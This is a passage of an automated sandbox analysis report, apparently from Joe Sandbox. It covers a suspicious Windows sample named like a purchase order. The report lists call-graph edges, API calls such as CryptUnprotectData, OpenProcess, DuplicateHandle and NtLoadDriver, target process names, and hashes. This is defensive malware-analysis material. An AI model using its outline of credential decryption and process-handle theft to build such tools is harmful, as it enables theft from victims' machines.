40dee7 OpenProcess 39078->39079 39080 40debd _wcsicmp 39078->39080 39079->39082 39080->39079 39081 40ded0 _wcsicmp 39080->39081 39081->39079 39081->39082 39082->39075 39082->39078 39083 40dfef CloseHandle 39082->39083 39084 40df78 39082->39084 39085 40df23 GetCurrentProcess DuplicateHandle 39082->39085 39088 40df8f CloseHandle 39082->39088 39083->39082 39084->39083 39084->39088 39089 40dfae _wcsicmp 39084->39089 39085->39082 39086 40df4c memset 39085->39086 39087 41352f 9 API calls 39086->39087 39087->39082 39088->39084 
39089->39082 39089->39084 39091 409a74 GetTempFileNameW 39090->39091 39092 409a66 GetWindowsDirectoryW 39090->39092 39091->39003 39092->39091 39093->39005 39095 406bd5 39094->39095 39096 406bad 39094->39096 39098 4066bf free malloc memcpy free free 39095->39098 39103 406c0f 39095->39103 39096->39095 39097 406bba _wcsicmp 39096->39097 39097->39095 39097->39096 39099 406be5 39098->39099 39100 40afcf ??2@YAPAXI ??3@YAXPAX 39099->39100 39099->39103 39101 406bff 39100->39101 39102 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39101->39102 39102->39103 39103->39014 39103->39015 39105 4069c4 ??3@YAXPAX 39104->39105 39106 4069af 39105->39106 39107 40b633 free 39106->39107 39108 4069ba 39107->39108 39109 40b04b ??3@YAXPAX 39108->39109 39110 4069c2 39109->39110 39110->38983 39111->39020 39112->39020 39113->39020 39114->39020 39115->39038 39116->39045 39118 40aa33 39117->39118 39119 40aa63 39117->39119 39120 40aa44 39118->39120 39121 40aa38 wcslen 39118->39121 39119->39038 39122 40a9ce malloc memcpy free free 39120->39122 39121->39120 39123 40aa4d 39122->39123 39123->39119 39124 40aa51 memcpy 39123->39124 39124->39119 39125->39038 39126->39038 39128 40a980 39127->39128 39129 40a8bb 39128->39129 39130 40a995 _wcsicmp 39128->39130 39131 40a99c wcscmp 39128->39131 39129->38893 39129->38894 39130->39128 39131->39128 39132->38897 39133->38901 39135 40aa23 RegEnumValueW 39134->39135 39135->38908 39135->38909 39137 405335 39136->39137 39138 40522a 39136->39138 39137->38493 39139 40b2cc 27 API calls 39138->39139 39140 405234 39139->39140 39141 40a804 8 API calls 39140->39141 39142 40523a 39141->39142 39181 40b273 39142->39181 39144 405248 _mbscpy _mbscat GetProcAddress 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39184 405211 GetProcAddress 39146->39184 39148 405282 39149 40b273 27 API calls 39148->39149 39150 40528f 39149->39150 39185 405211 GetProcAddress 39150->39185 39152 405298 39153 40b273 27 API calls 39152->39153 39154 4052a5 39153->39154 
39186 405211 GetProcAddress 39154->39186 39156 4052ae 39157 40b273 27 API calls 39156->39157 39158 4052bb 39157->39158 39187 405211 GetProcAddress 39158->39187 39160 4052c4 39161 40b273 27 API calls 39160->39161 39162 4052d1 39161->39162 39188 405211 GetProcAddress 39162->39188 39164 4052da 39165 40b273 27 API calls 39164->39165 39166 4052e7 39165->39166 39189 405211 GetProcAddress 39166->39189 39168 4052f0 39169 40b273 27 API calls 39168->39169 39170 4052fd 39169->39170 39190 405211 GetProcAddress 39170->39190 39172 405306 39173 40b273 27 API calls 39172->39173 39174 405313 39173->39174 39191 405211 GetProcAddress 39174->39191 39176 40531c 39177 40b273 27 API calls 39176->39177 39178 405329 39177->39178 39192 405211 GetProcAddress 39178->39192 39180 405332 39180->39137 39182 40b58d 27 API calls 39181->39182 39183 40b18c 39182->39183 39183->39144 39184->39148 39185->39152 39186->39156 39187->39160 39188->39164 39189->39168 39190->39172 39191->39176 39192->39180 39194 405220 39 API calls 39193->39194 39195 405369 39194->39195 39195->38926 39195->38927 39196->38929 39197->38933 39198->38930 39199->38927 39201 40440c FreeLibrary 39200->39201 39202 40436d 39201->39202 39203 40a804 8 API calls 39202->39203 39204 404377 39203->39204 39205 404383 39204->39205 39206 404405 39204->39206 39207 40b273 27 API calls 39205->39207 39206->38498 39206->38499 39206->38500 39208 40438d GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043a7 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043ba GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4043ce GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4043e2 GetProcAddress 39215->39216 39217 4043f1 39216->39217 39218 4043f7 39217->39218 39219 40440c FreeLibrary 39217->39219 39218->39206 39219->39206 39221 404413 FreeLibrary 39220->39221 39222 40441e 39220->39222 39221->39222 39222->38515 39223->38511 39225 40447e 39224->39225 39226 40442e 
39224->39226 39227 404485 CryptUnprotectData 39225->39227 39228 40449c 39225->39228 39229 40b2cc 27 API calls 39226->39229 39227->39228 39228->38511 39230 404438 39229->39230 39231 40a804 8 API calls 39230->39231 39232 40443e 39231->39232 39233 404445 39232->39233 39234 404467 39232->39234 39235 40b273 27 API calls 39233->39235 39234->39225 39237 404475 FreeLibrary 39234->39237 39236 40444f GetProcAddress 39235->39236 39236->39234 39238 404460 39236->39238 39237->39225 39238->39234 39240 4135f6 39239->39240 39241 4135eb FreeLibrary 39239->39241 39240->38518 39241->39240 39243 4449c4 39242->39243 39244 444a52 39242->39244 39245 40b2cc 27 API calls 39243->39245 39244->38535 39244->38536 39246 4449cb 39245->39246 39247 40a804 8 API calls 39246->39247 39248 4449d1 39247->39248 39249 40b273 27 API calls 39248->39249 39250 4449dc GetProcAddress 39249->39250 39251 40b273 27 API calls 39250->39251 39252 4449f3 GetProcAddress 39251->39252 39253 40b273 27 API calls 39252->39253 39254 444a04 GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 444a15 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 444a26 GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 444a37 GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 444a48 GetProcAddress 39261->39262 39262->39244 39263->38546 39264->38546 39265->38546 39266->38546 39267->38537 39269 403a29 39268->39269 39283 403bed memset memset 39269->39283 39271 403ae7 39296 40b1ab free free 39271->39296 39273 403a3f memset 39277 403a2f 39273->39277 39274 403aef 39274->38554 39275 40a8d0 7 API calls 39275->39277 39276 409d1f 6 API calls 39276->39277 39277->39271 39277->39273 39277->39275 39277->39276 39278 409b98 GetFileAttributesW 39277->39278 39278->39277 39280 40a051 GetFileTime CloseHandle 39279->39280 39281 4039ca CompareFileTime 39279->39281 39280->39281 39281->38554 39282->38553 39284 414c2e 17 API calls 39283->39284 39285 403c38 39284->39285 39286 
409719 2 API calls 39285->39286 39287 403c3f wcscat 39286->39287 39288 414c2e 17 API calls 39287->39288 39289 403c61 39288->39289 39290 409719 2 API calls 39289->39290 39291 403c68 wcscat 39290->39291 39297 403af5 39291->39297 39294 403af5 20 API calls 39295 403c95 39294->39295 39295->39277 39296->39274 39298 403b02 39297->39298 39299 40ae18 9 API calls 39298->39299 39307 403b37 39299->39307 39300 403bdb 39301 40aebe FindClose 39300->39301 39303 403be6 39301->39303 39302 40add4 wcscmp wcscmp 39302->39307 39303->39294 39304 40ae18 9 API calls 39304->39307 39305 40ae51 9 API calls 39305->39307 39306 40aebe FindClose 39306->39307 39307->39300 39307->39302 39307->39304 39307->39305 39307->39306 39308 40a8d0 7 API calls 39307->39308 39308->39307 39310 409d1f 6 API calls 39309->39310 39311 404190 39310->39311 39324 409b98 GetFileAttributesW 39311->39324 39313 40419c 39314 4041a7 6 API calls 39313->39314 39315 40435c 39313->39315 39317 40424f 39314->39317 39315->38580 39317->39315 39318 40425e memset 39317->39318 39320 409d1f 6 API calls 39317->39320 39321 40a8ab 9 API calls 39317->39321 39325 414842 39317->39325 39318->39317 39319 404296 wcscpy 39318->39319 39319->39317 39320->39317 39322 4042b6 memset memset _snwprintf wcscpy 39321->39322 39322->39317 39323->38578 39324->39313 39328 41443e 39325->39328 39327 414866 39327->39317 39329 41444b 39328->39329 39330 414451 39329->39330 39331 4144a3 GetPrivateProfileStringW 39329->39331 39332 414491 39330->39332 39333 414455 wcschr 39330->39333 39331->39327 39335 414495 WritePrivateProfileStringW 39332->39335 39333->39332 39334 414463 _snwprintf 39333->39334 39334->39335 39335->39327 39336->38584 39338 40b2cc 27 API calls 39337->39338 39339 409615 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 409625 39340->39341 39366 409b98 GetFileAttributesW 39341->39366 39343 409634 39344 409648 39343->39344 39367 4091b8 memset 39343->39367 39346 40b2cc 27 API calls 39344->39346 39349 408801 39344->39349 39347 40965d 39346->39347 
39348 409d1f 6 API calls 39347->39348 39350 40966d 39348->39350 39349->38587 39349->38614 39419 409b98 GetFileAttributesW 39350->39419 39352 40967c 39352->39349 39353 409681 39352->39353 39420 409529 72 API calls 39353->39420 39355 409690 39355->39349 39356->38609 39366->39343 39421 40a6e6 WideCharToMultiByte 39367->39421 39369 409202 39422 444432 39369->39422 39372 40b273 27 API calls 39373 409236 39372->39373 39468 438552 39373->39468 39376 409383 39378 40b273 27 API calls 39376->39378 39379 409399 39378->39379 39382 438552 134 API calls 39379->39382 39400 4093a3 39382->39400 39386 4094ff 39389 4251c4 137 API calls 39389->39400 39393 4093df 39496 424f26 123 API calls 39393->39496 39395 4253cf 17 API calls 39395->39400 39399 40951d 39399->39344 39400->39386 39400->39389 39400->39393 39400->39395 39403 4093e4 39400->39403 39494 4253af 17 API calls 39403->39494 39419->39352 39420->39355 39421->39369 39518 4438b5 39422->39518 39424 44444c 39425 409215 39424->39425 39532 415a6d 39424->39532 39425->39372 39425->39399 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 111 API calls 39429->39432 39536 415258 39430->39536 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39539 444316 39434->39539 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39467->39427 39657 438460 39468->39657 39470 409240 39470->39376 39471 4251c4 39470->39471 39708 424f07 39471->39708 39473 4251e4 39474 4251f7 39473->39474 39475 4251e8 39473->39475 39496->39386 39519 4438d0 39518->39519 39529 4438c9 39518->39529 39606 415378 memcpy memcpy 39519->39606 39529->39424 39533 415a77 39532->39533 39534 415a8d 39533->39534 39535 415a7e memset 39533->39535 39534->39428 39535->39534 39537 4438b5 11 API calls 39536->39537 39538 41525d 39537->39538 39538->39433 39540 
444328 39539->39540 39541 444423 39540->39541 39542 44434e 39540->39542 39607 4446ea 11 API calls 39541->39607 39543 432d4e 3 API calls 39542->39543 39545 44435a 39543->39545 39547 444375 39545->39547 39552 44438b 39545->39552 39546 432d4e 3 API calls 39548 4443ec 39546->39548 39549 416935 16 API calls 39547->39549 39550 444381 39548->39550 39551 416935 16 API calls 39548->39551 39549->39550 39550->39439 39551->39550 39552->39546 39607->39550 39669 41703f 39657->39669 39659 43847a 39660 43848a 39659->39660 39661 43847e 39659->39661 39676 438270 39660->39676 39706 4446ea 11 API calls 39661->39706 39666 4384bb 39667 438270 134 API calls 39666->39667 39668 438488 39667->39668 39668->39470 39670 417044 39669->39670 39671 41705c 39669->39671 39673 416760 11 API calls 39670->39673 39675 417055 39670->39675 39672 417075 39671->39672 39674 41707a 11 API calls 39671->39674 39672->39659 39673->39675 39674->39670 39675->39659 39677 415a91 memset 39676->39677 39678 43828d 39677->39678 39679 438297 39678->39679 39680 438341 39678->39680 39682 4382d6 39678->39682 39681 415c7d 16 API calls 39679->39681 39683 44358f 19 API calls 39680->39683 39684 438458 39681->39684 39685 4382fb 39682->39685 39686 4382db 39682->39686 39696 438318 39683->39696 39684->39668 39707 424f26 123 API calls 39684->39707 39688 415c23 memcpy 39685->39688 39687 416935 16 API calls 39686->39687 39689 4382e9 39687->39689 39690 438305 39688->39690 39691 415c7d 16 API calls 39689->39691 39693 44358f 19 API calls 39690->39693 39690->39696 39691->39679 39692 438373 39695 438383 39692->39695 39697 4300e8 memset memset memcpy 39692->39697 39693->39696 39694 43819e 115 API calls 39694->39692 39698 4383cd 39695->39698 39700 415c23 memcpy 39695->39700 39696->39692 39696->39694 39697->39695 39700->39698 39706->39668 39707->39666 39709 424f1f 39708->39709 39710 424f0c 39708->39710 39729 424eea 11 API calls 39709->39729 39728 416760 11 API calls 39710->39728 39713 424f18 39713->39473 39714 424f24 39714->39473 39728->39713 
39729->39714 39807 413f4f 39780->39807 39783 413f37 K32GetModuleFileNameExW 39784 413f4a 39783->39784 39784->38644 39786 413969 wcscpy 39785->39786 39787 41396c wcschr 39785->39787 39790 413a3a 39786->39790 39787->39786 39789 41398e 39787->39789 39812 4097f7 wcslen wcslen _memicmp 39789->39812 39790->38644 39792 41399a 39793 4139a4 memset 39792->39793 39794 4139e6 39792->39794 39813 409dd5 GetWindowsDirectoryW wcscpy 39793->39813 39796 413a31 wcscpy 39794->39796 39797 4139ec memset 39794->39797 39796->39790 39814 409dd5 GetWindowsDirectoryW wcscpy 39797->39814 39798 4139c9 wcscpy wcscat 39798->39790 39800 413a11 memcpy wcscat 39800->39790 39802 413cb0 GetModuleHandleW 39801->39802 39803 413cda 39801->39803 39802->39803 39806 413cbf GetProcAddress 39802->39806 39804 413ce3 GetProcessTimes 39803->39804 39805 413cf6 39803->39805 39804->38649 39805->38649 39806->39803 39808 413f2f 39807->39808 39809 413f54 39807->39809 39808->39783 39808->39784 39810 40a804 8 API calls 39809->39810 39811 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39810->39811 39811->39808 39812->39792 39813->39798 39814->39800 39815->38669 39816->38693 39818 409cf9 GetVersionExW 39817->39818 39819 409d0a 39817->39819 39818->39819 39819->38698 39819->38704 39820->38705 39821->38709 39822->38711 39823->38777 39825 40bba5 39824->39825 39869 40cc26 39825->39869 39828 40bd4b 39890 40cc0c 39828->39890 39833 40b2cc 27 API calls 39834 40bbef 39833->39834 39897 40ccf0 _wcsicmp 39834->39897 39836 40bbf5 39836->39828 39898 40ccb4 6 API calls 39836->39898 39838 40bc26 39839 40cf04 17 API calls 39838->39839 39840 40bc2e 39839->39840 39841 40bd43 39840->39841 39842 40b2cc 27 API calls 39840->39842 39843 40cc0c 4 API calls 39841->39843 39844 40bc40 39842->39844 39843->39828 39899 40ccf0 _wcsicmp 39844->39899 39846 40bc46 39846->39841 39847 40bc61 memset memset WideCharToMultiByte 39846->39847 39900 40103c strlen 39847->39900 39849 40bcc0 39850 40b273 27 API calls 39849->39850 
39851 40bcd0 memcmp 39850->39851 39851->39841 39852 40bce2 39851->39852 39853 404423 38 API calls 39852->39853 39854 40bd10 39853->39854 39854->39841 39855 40bd3a LocalFree 39854->39855 39856 40bd1f memcpy 39854->39856 39855->39841 39856->39855 39857->38792 39858->38829 39859->38829 39860->38829 39861->38829 39862->38829 39863->38829 39864->38829 39865->38829 39866->38829 39867->38804 39868->38826 39901 4096c3 CreateFileW 39869->39901 39871 40cc34 39872 40cc3d GetFileSize 39871->39872 39880 40bbca 39871->39880 39873 40afcf 2 API calls 39872->39873 39874 40cc64 39873->39874 39902 40a2ef ReadFile 39874->39902 39876 40cc71 39903 40ab4a MultiByteToWideChar 39876->39903 39878 40cc95 CloseHandle 39879 40b04b ??3@YAXPAX 39878->39879 39879->39880 39880->39828 39881 40cf04 39880->39881 39882 40b633 free 39881->39882 39883 40cf14 39882->39883 39909 40b1ab free free 39883->39909 39885 40cf1b 39886 40cfef 39885->39886 39889 40bbdd 39885->39889 39910 40cd4b 39885->39910 39888 40cd4b 14 API calls 39886->39888 39888->39889 39889->39828 39889->39833 39891 40b633 free 39890->39891 39892 40cc15 39891->39892 39893 40aa04 free 39892->39893 39894 40cc1d 39893->39894 39951 40b1ab free free 39894->39951 39896 40b7d4 memset CreateFileW 39896->38784 39896->38785 39897->39836 39898->39838 39899->39846 39900->39849 39901->39871 39902->39876 39904 40ab93 39903->39904 39905 40ab6b 39903->39905 39904->39878 39906 40a9ce 4 API calls 39905->39906 39907 40ab74 39906->39907 39908 40ab7c MultiByteToWideChar 39907->39908 39908->39904 39909->39885 39911 40cd7b 39910->39911 39912 40aa29 6 API calls 39911->39912 39916 40cd89 39912->39916 39913 40cef5 39914 40aa04 free 39913->39914 39915 40cefd 39914->39915 39915->39885 39916->39913 39917 40aa29 6 API calls 39916->39917 39918 40ce1d 39917->39918 39919 40aa29 6 API calls 39918->39919 39920 40ce3e 39919->39920 39921 40ce6a 39920->39921 39944 40abb7 wcslen memmove 39920->39944 39922 40ce9f 39921->39922 39947 40abb7 wcslen memmove 39921->39947 39925 40a8d0 7 
API calls 39922->39925 39928 40ceb5 39925->39928 39926 40ce56 39945 40aa71 wcslen 39926->39945 39927 40ce8b 39948 40aa71 wcslen 39927->39948 39932 40a8d0 7 API calls 39928->39932 39931 40ce5e 39946 40abb7 wcslen memmove 39931->39946 39935 40cecb 39932->39935 39933 40ce93 39949 40abb7 wcslen memmove 39933->39949 39950 40d00b malloc memcpy free free 39935->39950 39938 40cedd 39939 40aa04 free 39938->39939 39940 40cee5 39939->39940 39941 40aa04 free 39940->39941 39942 40ceed 39941->39942 39943 40aa04 free 39942->39943 39943->39913 39944->39926 39945->39931 39946->39921 39947->39927 39948->39933 39949->39922 39950->39938 39951->39896 39952->38844 39953->38852 40449 441819 40452 430737 40449->40452 40451 441825 40453 430756 40452->40453 40465 43076d 40452->40465 40454 430774 40453->40454 40455 43075f 40453->40455 40467 43034a memcpy 40454->40467 40466 4169a7 11 API calls 40455->40466 40458 4307ce 40460 430819 memset 40458->40460 40468 415b2c 11 API calls 40458->40468 40459 43077e 40459->40458 40463 4307fa 40459->40463 40459->40465 40460->40465 40462 4307e9 40462->40460 40462->40465 40469 4169a7 11 API calls 40463->40469 40465->40451 40466->40465 40467->40459 40468->40462 40469->40465 40470 41493c EnumResourceNamesW

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                      • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                                                      • API String ID: 708747863-2348828428
                                                                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 773 40b58d-40b59e 774 40b5a4-40b5c0 GetModuleHandleW FindResourceW 773->774 775 40b62e-40b632 773->775 776 40b5c2-40b5ce LoadResource 774->776 777 40b5e7 774->777 776->777 778 40b5d0-40b5e5 SizeofResource LockResource 776->778 779 40b5e9-40b5eb 777->779 778->779 779->775 780 40b5ed-40b5ef 779->780 780->775 781 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 780->781 781->775
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                      • String ID: AE$BIN
                                                                                                      • API String ID: 1668488027-3931574542
                                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 767404330-0
